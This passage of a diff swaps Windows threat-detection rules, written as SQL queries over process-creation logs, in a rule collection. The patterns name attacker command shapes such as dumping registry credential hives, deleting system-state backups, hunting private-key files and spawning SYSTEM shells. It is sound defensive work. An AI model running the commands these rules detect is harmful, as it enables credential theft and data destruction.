Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": 
"ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "title": "System Network Connections Discovery Via Net.EXE", + "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "status": "experimental", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_net_network_connections_discovery.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Import 
LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "status": "experimental", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "System administrator Usage" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + 
"attack.t1036.007" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' 
ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Hidden Powershell in Link File Pattern", - "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", - "status": "test", - "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "title": "DirLister Execution", + "id": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "status": "experimental", + "description": "Detect the usage of \"DirLister.exe\" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate commands in .lnk files" + "Legitimate use by users" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'DirLister.exe' OR NewProcessName LIKE '%\\\\dirlister.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_embed_exe_lnk.yml" + "filename": "proc_creation_win_dirlister_execution.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" 
flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine 
LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "Unmount Share Via Net.EXE", - "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.005" + "attack.t1036.003" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_share_unmount.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.impact", + "attack.t1490" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" + ], + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", + "id": "01c42d3c-242d-4655-85b2-34f1739632f7", "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects usage of Dsacls to grant over permissive permissions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate administrators granting over permissive permissions to users" ], - "level": "high", + "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_dsacls_abuse_permissions.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "description": "Detects usage of wsudo (Windows Sudo Utility). 
Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "WinDbg/CDB LOLBIN Usage", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" ], "falsepositives": [ - "To be determined" + "Legitimate use of debugging tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", - "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. 
This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", + "title": "Suspicious Network Command", + "id": "a29c1813-ab1f-4dde-b489-330b952e91ae", "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Administrator, hotline ask to user" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' OR CommandLine LIKE '%netsh interface show interface%' ESCAPE '\\' OR CommandLine LIKE '%arp -a%' ESCAPE '\\' OR CommandLine LIKE '%nbtstat -n%' ESCAPE '\\' OR CommandLine LIKE '%net config%' ESCAPE '\\' OR CommandLine LIKE '%route print%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_susp_network_command.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", - "status": "test", - 
"description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR 